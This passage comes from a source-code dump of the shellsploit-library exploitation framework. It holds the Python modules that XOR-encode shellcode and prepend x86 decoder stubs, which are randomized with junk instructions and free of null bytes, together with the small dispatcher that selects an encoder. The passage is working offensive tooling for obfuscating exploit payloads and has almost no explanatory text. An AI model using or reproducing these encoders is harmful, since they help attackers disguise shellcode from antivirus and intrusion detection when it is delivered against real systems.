hero.main(obfuscate=True, bzip2=True, gzip=False, files=kwargs['files']) 24 | elif "gzip" in kwargs['payload']: 25 | hero.main(obfuscate=True, bzip2=False, gzip=True, files=kwargs['files']) 26 | -------------------------------------------------------------------------------- /shellsploit/encoders/shellcode/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/encoders/shellcode/__init__.py -------------------------------------------------------------------------------- /shellsploit/encoders/shellcode/payloads.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | class Encoders(object): 10 | def __init__(self): 11 | self.shellcode = [ 12 | "encoders/shellcode/intel/x86/xor86.py", 13 | "encoders/shellcode/intel/x86/xor_b3m.py", 14 | "encoders/shellcode/intel/x86/xor64.py", 15 | ] 16 | 17 | def ret(self): 18 | return len(self.shellcode) 19 | -------------------------------------------------------------------------------- /shellsploit/encoders/shellcode/starter.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from .payloads import * 10 | 11 | 12 | def control(**kwargs): 13 | if kwargs['payload'] in Encoders().shellcode: 14 | data = open(kwargs['files'][0], "r").read().strip() 15 | 16 | if kwargs['payload'] == "encoders/shellcode/intel/x86/xor86.py": 17 | from .xor import prestart 18 | elif kwargs['payload'] == "encoders/shellcode/intel/x86/xor_b3m.py": 19 | from .xor_b3m import prestart 20 | 21 | with open(kwargs['files'][0], "w") as encoded: 22 | encoded.write(prestart((data.replace("\\x", "")), kwargs['iteration'])) 23 | -------------------------------------------------------------------------------- /shellsploit/encoders/shellcode/xor.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from sys import setrecursionlimit 10 | from sys import version_info 11 | from re import findall 12 | from binascii import hexlify 13 | 14 | setrecursionlimit(9999) 15 | 16 | 17 | def xorme(data): 18 | from random import randint 19 | xor = [hex(x) for x in range(20, 256)][randint(0, len([hex(x) for x in range(20, 256)]) - 1)] 20 | shellcode = "" 21 | 22 | if version_info.major >= 3: 23 | for x in hexlify(data.encode('utf8')): 24 | y = x ^ int(xor, 16) 25 | shellcode += '0x%02x,' % y 26 | else: 27 | for x in bytearray(data.decode("hex")): 28 | y = x ^ int(xor, 16) 29 | shellcode += '0x%02x,' % y 30 | 31 | padding = str(shellcode) + str(xor) 32 | shellcode = "EB095E8036" 33 | shellcode += str(xor).replace("0x", "") 34 | shellcode += "7408" 35 | shellcode += "46" 36 | shellcode += "EBF8" 37 | shellcode += "E8F2FFFFFF" 38 | shellcode += padding.replace("0x", "").replace(",", "") 39 | return shellcode 40 | 41 | 42 | def start(shellcode): 43 | try: 44 | control = True 45 | while control == True: 46 | qe = findall("..?", xorme(shellcode)) 47 | if "00" in qe: 48 | qe = findall("..?", xorme(shellcode)) 49 | control = True 50 | else: 51 | control = False 52 | return "".join(qe) 53 | except: 54 | print("After roll 9999 times,payload generate failed.") 55 | 56 | 57 | def prestart(data, roll=None): 58 | if roll == None or roll == 1: 59 | data = start(data) 60 | elif roll > 50: 61 | return "Please do not use iteration more than 50 times ..." 62 | else: 63 | for x in range(int(roll)): 64 | data = start(data) 65 | 66 | qe = findall("..?", data) 67 | return "\\x" + "\\x".join(qe).lower() 68 | -------------------------------------------------------------------------------- /shellsploit/encoders/shellcode/xor_b3m.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from random import randint 10 | from itertools import product 11 | from sys import setrecursionlimit 12 | from re import findall 13 | from sys import exit 14 | from sys import version_info 15 | from binascii import hexlify 16 | 17 | 18 | setrecursionlimit(9999) 19 | 20 | 21 | def xorme(shellcode): 22 | cache = shellcode 23 | mylist = ["".join(x) for x in list(product("ABCDEF", repeat=2))] 24 | insert = mylist[randint(0, len(mylist) - 1)] 25 | xorfirst = [ 26 | r"\x40", # inc eax 27 | r"\x43", # inc ebx 28 | r"\x42", # inc edx 29 | r"\x47", # inc edi 30 | ] 31 | header = xorfirst[randint(0, len(xorfirst) - 1)] 32 | header += r"\xEB\x0D" 33 | header += xorfirst[randint(0, len(xorfirst) - 1)] 34 | header += r"\x5E" 35 | header += xorfirst[randint(0, len(xorfirst) - 1)] 36 | header += r"\x80\x36" 37 | header += r"\x" + insert 38 | header += r"\x74\x0A\x46" 39 | header += xorfirst[randint(0, len(xorfirst) - 1)] 40 | header += r"\xEB\xF7" 41 | header += xorfirst[randint(0, len(xorfirst) - 1)] 42 | header += r"\xE8\xEF\xFF\xFF\xFF" 43 | 44 | encode = "" 45 | if version_info.major >= 3: 46 | for x in hexlify(cache.encode('utf8')): 47 | y = x ^ int("0x" + insert, 16) 48 | test = r'\x%02x' % y 49 | encode += test 50 | else: 51 | for x in bytearray(cache.decode("hex")): 52 | y = x ^ int("0x" + insert, 16) 53 | test = r'\x%02x' % y 54 | encode += test 55 | 56 | header += encode.upper() 57 | header += r"\x" + insert 58 | 59 | if r"\x00" in header.lower(): 60 | xorme(shellcode) 61 | return header.lower().replace("\\x", "") 62 | 63 | 64 | def start(shellcode): 65 | try: 66 | control = True 67 | while control == True: 68 | qe = findall("..?", xorme(shellcode)) 69 | if "00" in qe: 70 | qe = findall("..?", xorme(shellcode)) 71 | control = True 72 | else: 73 | control = False 74 | return "".join(qe) 75 | except: 76 | return "After roll 9999 times,payload generate failed." 77 | 78 | 79 | def prestart(data, roll=None): 80 | cache = True 81 | if roll == None or roll == 1: 82 | data = start(data) 83 | cache = False 84 | elif roll > 25: 85 | return "This script is still BETA.Please do not use iteration more than 25 times." 86 | else: 87 | cache = False 88 | for x in range(int(roll)): 89 | if data == "After roll 9999 times,payload generate failed.": 90 | cache = True 91 | break 92 | data = start(data) 93 | 94 | if cache == False: 95 | qe = findall("..?", data) 96 | return "\\x" + "\\x".join(qe).lower() 97 | else: 98 | return "After roll 9999 times,payload generate failed." 99 | --------------------------------------------------------------------------------